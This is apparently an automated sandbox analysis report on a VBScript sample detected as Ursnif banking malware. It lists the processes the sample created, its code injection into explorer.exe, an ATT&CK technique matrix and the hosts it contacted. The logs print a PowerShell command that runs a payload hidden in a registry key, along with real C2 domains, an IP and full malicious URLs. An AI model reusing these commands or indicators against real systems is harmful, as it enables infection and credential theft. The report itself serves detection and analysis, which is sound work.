Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC9.tmp' 'c:\Users\user\AppData\Local\Temp\wyozc5bn\CSC8A734EFC87854564869CBAF05337FE1.TMP'
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: explorer.exe, 00000025.00000000.681449997.0000000005EA0000.00000004.00000001.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000000.701018945.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.701396409.0000000001640000.00000002.00020000.sdmp, control.exe, 00000026.00000000.691432717.000001BF34810000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.756089059.000002413A990000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E56CD6 cpuid 21_2_00E56CD6
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E566CE GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,21_2_00E566CE
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E56CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,21_2_00E56CD6
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_0558E3F3 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,21_2_0558E3F3
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_00E55A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,21_2_00E55A5D
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: avz.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: cports.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

                    Yara detected UrsnifShow sources
Source: Yara match, File source: 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.614926356.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615093761.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000002.756395478.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000003.693266563.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615032567.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615070826.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000003.693369864.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.622629289.0000000004FBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000003.754195346.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615054259.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615001343.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.615108911.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.614962724.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000003.693393885.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000003.754218301.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000002.758341683.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.618072747.00000000051B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000003.740363457.000001BF361AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000003.754002783.00000195D906C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 6072, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: control.exe PID: 2896, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4612, type: MEMORYSTR
Source: Yara match, File source: 21.3.rundll32.exe.50ba4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.3.rundll32.exe.50ba4a0.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.3.rundll32.exe.5168d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.3.rundll32.exe.51394a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000026.00000000.689267141.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000000.752570656.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.620983509.0000000005139000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000027.00000002.798303359.000002413CA11000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000000.690928250.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.741515734.0000000004E3F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000002.755802030.00000195D8AB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.742621606.000002174F3D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000000.692180683.00000000000B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000000.743168465.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000003.620941677.00000000050BA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000026.00000002.755316408.00000000000B1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000028.00000000.745515956.00000195D8AB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

Columns are the ATT&CK tactics; a trailing number is the count the report attaches to that technique; empty cells are left blank.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Windows Management Instrumentation 221 | Valid Accounts 1 | Valid Accounts 1 | Disable or Modify Tools 1 | Credential API Hooking 3 | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Default Accounts | Scripting 121 | Boot or Logon Initialization Scripts | Access Token Manipulation 1 | Scripting 121 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API 2 | Logon Script (Windows) | Process Injection 913 | Obfuscated Files or Information 2 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Credential API Hooking 3 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Exploitation for Client Execution 1 | Logon Script (Mac) | Logon Script (Mac) | File Deletion 1 | NTDS | System Information Discovery 46 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Command and Scripting Interpreter 1 | Network Logon Script | Network Logon Script | Rootkit 4 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | PowerShell 1 | Rc.common | Rc.common | Masquerading 11 | Cached Domain Credentials | Security Software Discovery 131 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Valid Accounts 1 | DCSync | Virtualization/Sandbox Evasion 41 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Modify Registry 1 | Proc Filesystem | Process Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation 1 | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Virtualization/Sandbox Evasion 41 | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection 913 | Input Capture | Remote System Discovery 1 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rundll32 1 | Keylogging | System Network Configuration Discovery 1 | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

                    Behavior Graph

Behavior Graph ID: 481077, Sample: 345678.vbs, Startdate: 10/09/2021, Architecture: WINDOWS, Score: 100

The graph image did not survive extraction; the process tree it encoded, with dropped files, contacted hosts and per-process signatures, is rendered below as text.

345678.vbs (start)
  DNS/IP: art.microsoftsofymicrosoftsoft.at, resolver1.opendns.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 12 other signatures
  Started: mshta.exe, WmiPrvSE.exe, wscript.exe, 2 other processes
  mshta.exe
    Signatures: Suspicious powershell command line found
    Started: powershell.exe
    powershell.exe
      Dropped: C:\Users\user\AppData\Local\...\wyozc5bn.0.cs (UTF-8); C:\Users\user\AppData\...\uitt4j30.cmdline (UTF-8)
      Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 3 other signatures
      Injected: explorer.exe
      Started: csc.exe, csc.exe, conhost.exe
      explorer.exe (injected)
        Signatures: Changes memory attributes in foreign processes to executable or writable; Maps a DLL or memory area into another process; Disables SPDY (HTTP compression, likely to perform web injects); Creates a thread in another existing process (thread injection)
        Injected: RuntimeBroker.exe
        Started: cmd.exe
        cmd.exe
          Signatures: Uses nslookup.exe to query domains
          Started: conhost.exe, nslookup.exe
      csc.exe
        Dropped: C:\Users\user\AppData\Local\...\uitt4j30.dll (PE32)
        Started: cvtres.exe
      csc.exe
        Dropped: C:\Users\user\AppData\Local\...\wyozc5bn.dll (PE32)
        Started: cvtres.exe
  WmiPrvSE.exe
    Started: rundll32.exe
    rundll32.exe
      Started: rundll32.exe
      rundll32.exe
        DNS/IP: atl.bigbigpoppa.com 185.251.90.253, ports 49787, 49788, 49789, SPRINTHOSTRU, Russian Federation
        Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 2 other signatures
        Started: control.exe
        control.exe
          Signatures: Changes memory attributes in foreign processes to executable or writable; Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
          Started: rundll32.exe
  wscript.exe
    Dropped: C:\Users\user\AppData\Local\Temp\fum.cpp (PE32)
    Signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Deletes itself after installation; Creates processes via WMI

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

Source | Detection | Scanner | Label
21.2.rundll32.exe.e50000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                    Domains

Source | Detection | Scanner | Label
art.microsoftsofymicrosoftsoft.at | 4% | Virustotal |
atl.bigbigpoppa.com | 9% | Virustotal |

                    URLs

Source | Detection | Scanner | Label
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://crl.m5 | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
http://www.microsoft.co | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e | 100% | Avira URL Cloud | malware
http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6P | 100% | Avira URL Cloud | malware
http://atl.bigbigpoppa.com/t | 100% | Avira URL Cloud | malware
http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw | 100% | Avira URL Cloud | malware
http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT | 100% | Avira URL Cloud | malware

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
resolver1.opendns.com | 208.67.222.222 | true | false | | high
art.microsoftsofymicrosoftsoft.at | 185.251.90.253 | true | true | | unknown
atl.bigbigpoppa.com | 185.251.90.253 | true | true | | unknown

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://atl.bigbigpoppa.com/ip_2B0cVuBTOjpbo/BZT_2FEcZD79y2H/f3wS9_2BbAkX3nftyB/uQG5JIxM3/hkTHWn_2F_2BpOIsZCFn/4kLDBNiVWLvnXfwIKVW/_2B0IsHxbOfD1ufcXkPjJo/EpDoUxcMaWCn1/8Cn5O7LC/eCiAOLLPPUL3E_2BUmdr0wu/7S9z8dGBsB/5jo94woog9YMCzFYk/vxvIpoLH3pVt/RLdRfO7DC2t/yTMvjyOY5hDeBN/auRC60Y4xtz4V1KDXQP2K/Ose2dfWgeEs0tX4x/hD9nLBJRnyryDU3/xZZDK1S2EJHUeFDAor/G09c8MwYv/_2Fz2PGThD9ITT_2BYVA/tVMCZqyJgK7/e | true | Avira URL Cloud: malware | unknown
http://atl.bigbigpoppa.com/KT4MMOqgwbMDk0_2FZz0/hIq6vsma9IDMR0TWVEk/R8VcPjBU_2FKifNFKEzy11/KwQmwxa6PANLq/HMQB1nMh/Dw7iIk4wPDbFz5MpJKzoM6O/xJlNu7xTm_/2BJVkAx380cQPl1qK/3MJgDX4sXjAo/UjQmGmv6_2B/EYaPNSI604XL9z/GGit9THH2wZWixIY_2BGE/_2Ftywp1kQkPvPY6/vEmMzODz0Ya_2Fy/CBZtOZch7qD9e_2FA3/3G0B8QjO4/zLpP4zwh3X5MwZp6F5E2/r2m_2Fmc2A2sWLpGKPD/1LL4BJlsYqHKw2i3OPm1CI/3lMhUc9ldfLAb/BfOzMYbz/ndeDEqMw | true | Avira URL Cloud: malware | unknown
http://atl.bigbigpoppa.com/Fd_2Bpcxk2ML4o/4Yi_2FHrWiGKn0A5wFBvD/PRZfU6_2FH1DJVcW/g_2Fg_2F20KxTzq/sMEmuitPFPfj3EtNRD/SA_2FG4XJ/mT_2B9htxgpCM5Sw9dFG/0GOk5wMqEe7jZlQfLGf/mA_2FWhN50DkjSdhxWei_2/FhXBykIpEOclO/crxsB5_2/Ble8n4SiH0d5h4j9OhpB9W8/f7cJNH55_2/BDWX6KOpdls6GJZSC/G_2FbiyNPy_2/FypUL6okzx_/2FAWJjZB1eiGHh/hrIz0_2B7QDXJAzjWHaMR/znK_2FKxXJtI3gHn/_2FediiSJLPcwpE/ATZTCB8xbMUZrLNlLv/_2BOkapjZ/jvpLjf9IYNZ6/RyT | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000001F.00000002.779705406.000002175F47F000.00000004.00000001.sdmp | false | | high
http://constitution.org/usdeclar.txt | rundll32.exe, 00000015.00000003.674925950.00000000059B8000.00000004.00000040.sdmp, control.exe, 00000026.00000003.693326319.000001BF361AC000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000027.00000002.798196126.000002413C902000.00000004.00000001.sdmp, rundll32.exe, 00000028.00000003.754147567.00000195D906C000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001F.00000002.745514270.000002174F62F000.00000004.00000001.sdmp | false | | high
